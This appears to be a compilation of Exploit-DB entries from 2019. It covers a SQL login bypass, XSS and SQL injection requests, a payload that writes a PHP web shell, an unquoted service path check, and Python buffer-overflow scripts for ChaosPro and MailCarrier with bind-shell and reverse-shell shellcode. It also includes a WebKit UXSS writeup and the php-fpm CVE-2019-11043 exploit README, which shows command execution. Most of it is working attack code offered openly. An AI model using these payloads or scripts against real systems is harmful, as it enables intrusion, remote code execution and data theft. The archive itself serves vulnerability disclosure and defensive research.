# Exploit Title: Part-DB 0.4 - Authentication Bypass # Date: 2019-10-26 # Author: Marvoloo # Vendor Homepage: https://github.com/Part-DB/Part-DB/ # Software Link: https://github.com/Part-DB/Part-DB/archive/master.zip # Version: 0.4 # Tested on: Linux # CVE : N/A # Discription: # Easy authentication bypass vulnerability on the application # allowing the attacker to login # url: http://localhost/login.php # Parameter & Payload: '=''or' #vulnerable file: login.php Line: 29,30 #POC POST /login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 24 Cookie: .... Connection: close Upgrade-Insecure-Requests: 1 DNT: 1

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git Version: 1.21 Tested on: CentOS7 CVE : N/A # Description: # Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application. #POC POST /addEvent.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.0.0.20/calendar03/ Content-Type: application/x-www-form-urlencoded Content-Length: 213 Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00

# Exploit Title: JumpStart 0.6.0.0 - 'jswpbapi' Unquoted Service Path # Google Dork: N/A # Date: 2019-09-09 # Exploit Author: Roberto Escamilla # Vendor Homepage:https://www.inforprograma.net/ # Software Link: https://www.inforprograma.net/ # Version: = 0.6.0.0 wpspin.exe # Tested on: Windows 10 Home # CVE : N/A ###############STEPS########################## # 1.- Install the JumpStart application on Windows 10 Home Operating System # 2.- Open our "System Symbol" application. # 3.- Execute the command -------wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ # 4.- The following will appear in a list: JumpStart Push-Button Service jswpbapi C:\Program Files (x86)\Jumpstart\jswpbapi.exe # 5.- We proceed to verify the process using the command icacls, with which we verify the protection of the directory as shown below: NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administradores:(I)(F) BUILTIN\Usuarios:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIONES:(I)(RX) ENTIDAD DE PAQUETES DE APLICACIONES\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX) # 6.- Finally we verify using the command sc qc jswpbapi the protection of the service in which we observe that it is scalable in privileges # since the route contains spaces without being in quotes and is in CONTROL_ERROR normal and NOMBRE_INICIO_SERVICIO: # LocalSystem as it's shown in the following [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: jswpbapi TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Jumpstart\jswpbapi.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : JumpStart Push-Button Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git Version: 1.32 Tested on: CentOS7 CVE : N/A # PoC: Multiple SQL Injection vulnerabilities # Nice and easy SQL Injection Parameter: datetime (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT] Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) # Pop a PHP CMD Shell ' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -

# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH) # Date: 2019-10-27 # Exploit Author: Chase Hatch (SYANiDE) # Vendor Homepage: http://www.chaospro.de/ # Software link: http://www.chaospro.de/cpro20.zip # Version: 2.0 # Tested on: Windows XP Pro OEM #!/usr/bin/env python2 import os, sys # sploit = "A"* 5000 ## Crash! 41414141 in SEH! via ProfilePath or PicturePath. Windows XP OEM # `locate pattern_create.rb | head -n 1` 5000 # 326d4431 # `locate pattern_offset.rb | head -n 1` 326d4431 5000 # 2705 # sploit = "A" * (2705 - 4 - 126) # 2575 # sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE # `locate pattern_offset.rb|head -n 1` 61413561 2575 # 16 ################ Second stage #################### sploit = "A"*16 # msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c sploit += ( "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70" "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50" "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b" "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50" "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c" "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b" "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30" "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b" "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70" "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63" "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f" "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b" "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d" "\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77" "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78" "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a" "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31" "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52" "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63" "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43" "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f" "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f" "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30" "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49" "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f" "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73" "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76" "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a" "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f" "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b" "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d" "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47" "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56" "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58" "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44" "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42" "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56" "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69" "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f" "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a" "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46" "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31" "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b" "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69" "\x6f\x39\x45\x41\x41" ) # 710 bytes sploit += "A" * (2575 - 16 - 710) ################ First stage #################### # ESP: 0012E75C # ESP target: 0012FF98 ## Need to align to four-byte and 16-byte boundaries: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc # 282.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc # 1551.0000 # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc # 183C # 0012FF32 54 PUSH ESP # 0012FF33 58 POP EAX # 0012FF34 66:05 3C18 ADD AX,183C # 0012FF38 50 PUSH EAX # 0012FF39 5C POP ESP sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8 # target instruction to push onto stack at new ESP: FFE4 JMP ESP # 4141E4FF # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803 # 0: 25 28 28 28 28 and eax,0x28282828 # 5: 25 47 47 47 47 and eax,0x47474747 # a: 2d 7f 01 7f 7f sub eax,0x7f7f017f # f: 2d 7f 01 01 01 sub eax,0x101017f # 14: 2d 03 18 3e 3e sub eax,0x3e3e1803 # 19: 50 push eax sploit += ( "\x25\x28\x28\x28\x28" "\x25\x47\x47\x47\x47" "\x2d\x7f\x01\x7f\x7f" "\x2d\x7f\x01\x01\x01" "\x2d\x03\x18\x3e\x3e" "\x50" ) # 26 bytes ## Realign new ESP with beginning of overflow buffer: ## New ESP should be four-byte and 16-byte aligned: # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc # 122.0000 # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc # 671.0000 # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc # A7C ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean) # 0012FF54 44 INC ESP # 0012FF55 44 INC ESP # 0012FF56 44 INC ESP # 0012FF57 44 INC ESP # 0012FF58 44 INC ESP # 0012FF59 44 INC ESP # 0012FF5A 44 INC ESP # 0012FF5B 44 INC ESP sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8 ## Going to have to carve out the address 0012F51C # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864 # 0: 25 02 02 02 02 and eax,0x2020202 # 5: 25 51 51 51 51 and eax,0x51515151 # a: 2d 7f 01 7f 7f sub eax,0x7f7f017f # f: 2d 01 01 01 61 sub eax,0x61010101 # 14: 2d 64 08 6d 1f sub eax,0x1f6d0864 # 19: 50 push eax sploit +=( "\x25\x02\x02\x02\x02" "\x25\x51\x51\x51\x51" "\x2d\x7f\x01\x7f\x7f" "\x2d\x01\x01\x01\x61" "\x2d\x64\x08\x6d\x1f" "\x50" ) # 26 bytes ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP # 5C POP ESP sploit += "\x5c" # 1 sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1) ################ RET from SEH: JMP SHORT - 126 #################### sploit += "\xeb\x80" + "\x41\x41" # 4 # 00401B44 |. 5F POP EDI # 00401B45 |> 5E POP ESI # 00401B46 \. C3 RETN sploit += "\x44\x1b\x40\x00" ################ build the config #################### ## Running from just outside base directory of ChaosPro: def ret_cfg(inp): # do it live in PicturePath cfg = """PicturePath %s""" % inp with open("chaospro\\ChaosPro.cfg",'w') as F: F.write(cfg) F.close() ret_cfg(sploit)

VULNERABILITY DETAILS HTMLFrameElementBase.cpp: ``` bool HTMLFrameElementBase::isURLAllowed() const { if (m_URL.isEmpty()) // ***4*** return true; return isURLAllowed(document().completeURL(m_URL)); } bool HTMLFrameElementBase::isURLAllowed(const URL& completeURL) const { if (document().page() && document().page()->subframeCount() >= Page::maxNumberOfFrames) // ***3*** return false; if (completeURL.isEmpty()) return true; if (WTF::protocolIsJavaScript(completeURL)) { RefPtr<Document> contentDoc = this->contentDocument(); if (contentDoc && !ScriptController::canAccessFromCurrentOrigin(contentDoc->frame(), document())) return false; } RefPtr<Frame> parentFrame = document().frame(); if (parentFrame) return parentFrame->isURLAllowed(completeURL); return true; } void HTMLFrameElementBase::openURL(LockHistory lockHistory, LockBackForwardList lockBackForwardList) { if (!isURLAllowed()) return; [...] parentFrame->loader().subframeLoader().requestFrame(*this, m_URL, frameName, lockHistory, lockBackForwardList); ``` NodeRarData.h: ``` class NodeRareData : public NodeRareDataBase { [...] private: unsigned m_connectedFrameCount : 10; // Must fit Page::maxNumberOfFrames. ***1*** ``` Page.h: ``` class Page : public Supplementable<Page>, public CanMakeWeakPtr<Page> { [...] // Don't allow more than a certain number of frames in a page. // This seems like a reasonable upper bound, and otherwise mutually // recursive frameset pages can quickly bring the program to its knees // with exponential growth in the number of frames. static const int maxNumberOfFrames = 1000; // ***2*** ``` Every DOM node stores the number of child frames currently attached to the subtree to speed up the `disconnectSubframes` algorithm; more specifically, when the number of connected frames for a given node is zero, its subtree won't be traversed. The value is stored as a 10-bit integer[1], so, to protect it from overflowing, an upper bound for the total count of attached subframes has been introduced[2]. It's enforced inside `isURLAllowed`[3] along with some other URL-specific checks. The problem is if the current URL is empty, all the checks will be skipped[4]. Therefore, an attacker can insert exactly 1024 frame elements with an empty URL into a node, so its connected subframe counter will overflow and become zero. Later, when the node is removed from the document tree, the subframes won't be detached. The attacker can also abuse the flaw to make a subframe "survive" a cross-origin page load because `disconnectDescendantFrames`, which is called during the document replacement, only processes `iframe` elements inside the document tree. Then, if the subframe is navigated to the `about:srcdoc` URL, the new document will inherit the security context from its parent document, which can be an arbitrary cross-origin page, while the contents will be attacker-controlled. Moving the check closer to the actual frame creation in `SubframeLoader::loadSubframe` should fix the issue. Besides, since the `srcdoc` technique can be reused in other UXSS bugs, I think it's reasonable to try to break it. One way to achieve that is to replace the `disconnectDescendantFrames` call in `Document::prepareForDestruction` with a call to `FrameLoader::detachChildren`, which detaches subframes regardless of whether their associated elements are attached to the document tree. However, I'm not sure if this change would be safe. The attached patch just adds a release assertion after `disconnectDescendantFrames` to ensure that all subframes have been detached. The solution is not too elegant, but a similar fix in Blink (https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/dom/document.cc?rcl=a34380189132e826108a71d9f6024b863ce1dcaf&l=3115) has proved to be effective. VERSION WebKit revision 247430 Safari version 12.1.1 (14607.2.6.1.1) REPRODUCTION CASE The minimal test case that demonstrates the issue is as follows: ``` <body> <script> const FRAME_COUNT = 1024; let container = document.body.appendChild(document.createElement('div')); for (let i = 0; i < FRAME_COUNT; ++i) { let frame = container.appendChild(document.createElement('iframe')); frame.style.display = 'none'; } container.remove(); frame = container.firstChild; alert(` <iframe> is not attached to the document tree, but still has a content frame! frame.parentNode.parentNode: ${frame.parentNode.parentNode} frame.contentWindow: ${frame.contentWindow} `); </script> </body> ``` The full UXSS exploit is in the attached archive. CREDIT INFORMATION Sergei Glazunov of Google Project Zero Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47552.zip

# PHuiP-FPizdaM ## What's this This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see [below](#the-full-list-of-preconditions)). ## What's vulnerable If a webserver runs nginx + php-fpm and nginx have a configuration like ``` location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... } ``` which also lacks any script existence checks (like `try_files`), then you can probably hack it with this sploit. #### The full list of preconditions 1. Nginx + php-fpm, `location ~ [^/]\.php(/|$)` must be forwarded to php-fpm (maybe the regexp can be stricter, see [#1](https://github.com/neex/phuip-fpizdam/issues/1)). 2. The `fastcgi_split_path_info` directive must be there and contain a regexp starting with `^` and ending with `$`, so we can break it with a newline character. 3. There must be a `PATH_INFO` variable assignment via statement `fastcgi_param PATH_INFO $fastcgi_path_info;`. At first, we thought it is always present in the `fastcgi_params` file, but it's not true. 4. No file existence checks like `try_files $uri =404` or `if (-f $uri)`. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch. 5. This exploit works only for PHP 7+, but the bug itself is present in earlier versions (see [below](#about-php5)). ## Isn't this known to be vulnerable for years? A long time ago php-fpm didn't restrict the extensions of the scripts, meaning that something like `/avatar.png/some-fake-shit.php` could execute `avatar.png` as a PHP script. This issue was fixed around 2010. The current one doesn't require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler. ## How to run Install it using ``` go get github.com/neex/phuip-fpizdam ``` If you get strange compilation errors, make sure you're using go >= 1.13. Run the program using `phuip-fpizdam [url]` (assuming you have the `$GOPATH/bin` inside your `$PATH`, otherwise specify the full path to the binary). Good output looks like this: ``` 2019/10/01 02:46:15 Base status code is 200 2019/10/01 02:46:15 Status code 500 for qsl=1745, adding as a candidate 2019/10/01 02:46:15 The target is probably vulnerable. Possible QSLs: [1735 1740 1745] 2019/10/01 02:46:16 Attack params found: --qsl 1735 --pisos 126 --skip-detect 2019/10/01 02:46:16 Trying to set "session.auto_start=0"... 2019/10/01 02:46:16 Detect() returned attack params: --qsl 1735 --pisos 126 --skip-detect <-- REMEMBER THIS 2019/10/01 02:46:16 Performing attack using php.ini settings... 2019/10/01 02:46:40 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/10/01 02:46:40 Trying to cleanup /tmp/a... 2019/10/01 02:46:40 Done! ``` After this, you can start appending `?a=<your command>` to all PHP scripts (you may need multiple retries). ## Playground environment If you want to reproduce the issue or play with the exploit locally, do the following: 1. Clone this repo and go to the `reproducer` directory. 2. Create the docker image using `docker build -t reproduce-cve-2019-11043 .`. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix. 2. Run the docker using `docker run --rm -ti -p 8080:80 reproduce-cve-2019-11043`. 3. Now you have http://127.0.0.1:8080/script.php, which is an empty file. 4. Run the exploit using `phuip-fpizdam http://127.0.0.1:8080/script.php` 5. If everything is ok, you'll be able to execute commands by appending `?a=` to the script: http://127.0.0.1:8080/script.php?a=id. Try multiple times as only some of php-fpm workers are infected. ## About PHP5 The buffer underflow in php-fpm is present in PHP version 5. However, this exploit makes use of an optimization used for storing FastCGI variables, [_fcgi_data_seg](https://github.com/php/php-src/blob/5d6e923/main/fastcgi.c#L186). This optimization is present only in php 7, so this particular exploit works only for php 7. There might be another exploitation technique that works in php 5. ## Credits Original anomaly discovered by [d90pwn](https://twitter.com/d90pwn) during Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found by [beched](https://twitter.com/ahack_ru). EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47553.zip

# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow # Date: 2019-10-01 # Author: Lance Biggerstaff # Original Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.tabslab.com/ # Version: 2.51 # Tested on: Windows 10 # Note: Every version of Windows 10 has a different offset and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯ #!/usr/bin/python import sys import socket import time #msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python buf = "" buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81" buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c" buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce" buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a" buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6" buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8" buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75" buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0" buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc" buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8" buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba" buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06" buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94" buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c" buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe" buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c" buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d" buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11" buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12" buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e" buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d" buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7" buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27" buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c" buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0" buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb" buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7" buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3" buf += "\x32\xb4\xfe\x5c" jmpesp = '\x23\x49\xA1\x0F' # buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down #buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5094 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5096 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("TARGET", 110)) print s.recv(1024) s.send('USER ' + buffer + '\r\n') print s.recv(1024) s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, but if you get here the exploit failed!"